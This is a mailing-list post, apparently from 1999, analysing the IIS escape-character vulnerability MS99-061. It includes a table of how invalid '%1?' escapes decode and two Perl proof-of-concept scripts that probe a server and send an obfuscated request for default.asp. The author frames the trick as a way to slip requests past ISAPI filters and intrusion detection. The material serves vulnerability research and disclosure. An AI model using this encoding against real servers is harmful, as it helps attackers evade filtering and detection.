More info on MS99-061 (IIS escape character vulnerability)

[rfp () WIRETRIP NET (.rain.forest.puppy.)]

I found myself curious on the exact happenings of this vulnerability, so I
decided to look into it further.  Who knows, maybe another anti-IDS tactic
for whisker. :)

Anyways, the problem is that IIS parses invalid hex escape sequences.  For
instance, %ff, %9a, and %0d are valid since FF, 9A, and 0D are valid
hexidecimal numbers.  To be valid, it must be two chars only using the
digits A-Z, a-z, and 0-9.  However, IIS was also allowing things such as
%qj, %0z, and %g4, which are not valid hexidecimal values.

So what I did was set out on a quest to find out what parses to what. I
came up with a rough table of mappings.  The results come from submitting
'%1?', where '?' is the character who's ascii value is represented below:

87 -> 0         137 -> i
88 -> 1         138 -> j
89 -> 2         139 -> k
90 -> 3         140 -> l
91 -> 4         141 -> m
92 -> 5         142 -> n
93 -> 6         143 -> o
94 -> 7         144 -> p
95 -> 8         145 -> q
96 -> 9         146 -> r
129 -> a        147 -> s
130 -> b        148 -> t
131 -> c        149 -> u
132 -> d        150 -> v
133 -> e        151 -> w
134 -> f        152 -> x
135 -> g        153 -> y
136 -> h        154 -> z

This table was generated using the first included perl program (below).
Now, to test it, I used the second perl program included below to make a
substituted request for 'default.asp'.  The important portion of the perl
program is:

$str="%1" . chr(132); # d
$str.="%1". chr(133); # e
$str.="%1". chr(134); # f
$str.="%1". chr(129); # a
$str.="%1". chr(149); # u
$str.="%1". chr(140); # l
$str.="%1". chr(148); # t
$str.='.';
$str.="%1". chr(129); # a
$str.="%1". chr(147); # s
$str.="%1". chr(144); # p

Here we see the request is made up of nothing bug '%1?', where ? is the
corresponding ascii character.  End result?  It works.

What does this allow you to bypass?  My guess is anything that plays or
needs the raw filename or request.  ISAPI filters and extension handlers
come to mind.  Who, what, where, and how are application specific.

Just a little bit of geek info.  I saw enough 'can we get more information
on this' posts that I thought I could shed a little more light on the
subject.  It was tough tho, with the depth of Microsoft's explanation in
their advisories. :)

rain forest puppy
rfp () wiretrip net / www.wiretrip.net/rfp/

-----------------------------------------------------------------

#!/usr/bin/perl
$|=1; use Socket;
$inet=inet_aton('10.0.0.1'); # webserver to test
@DXX=(); $val=0;

while($val++ < 255){
 $cval="\%1".chr($val);
 sendraw("GET /$cval.idc HTTP/1.0\n\n");
 foreach $line (@DXX){
 if($line=~/query file <b>\/([a-zA-Z0-9]+).idc<\/b>/){
  print "$val -> $1\n"; last;}}}

sub sendraw { my ($pstr)=@_;
 $PROTO=getprotobyname('tcp')||0;
 if(!(socket(S,PF_INET,SOCK_STREAM,$PROTO))){ die("socket");}
 if(connect(S,pack "SnA4x8",2,80,$inet)){
  select(S);      $|=1;
  print $pstr;    @DXX=<S>;
  select(STDOUT); close(S);
  return;
 } else { die("not responding"); }}

-----------------------------------------------------------------------

#!/usr/bin/perl
$|=1; use Socket;
$inet=inet_aton('10.0.0.1'); # webserver to test
@DXX=(); $val=0;

$str="%1".chr(132);  # d
$str.="%1".chr(133); # e
$str.="%1".chr(134); # f
$str.="%1".chr(129); # a
$str.="%1".chr(149); # u
$str.="%1".chr(140); # l
$str.="%1".chr(148); # t
$str.='.';
$str.="%1".chr(129); # a
$str.="%1".chr(147); # s
$str.="%1".chr(144); # p

sendraw("GET /$str HTTP/1.0\n\n");
print @DXX;

sub sendraw {   # raw network functions stay in here
        my ($pstr)=@_;
        $PROTO=getprotobyname('tcp')||0;
        if(!(socket(S,PF_INET,SOCK_STREAM,$PROTO))){ die("socket");}
        if(connect(S,pack "SnA4x8",2,80,$inet)){
                select(S);      $|=1;
                print $pstr;    @DXX=<S>;
                select(STDOUT); close(S);
                return;
        } else { die("not responding"); }}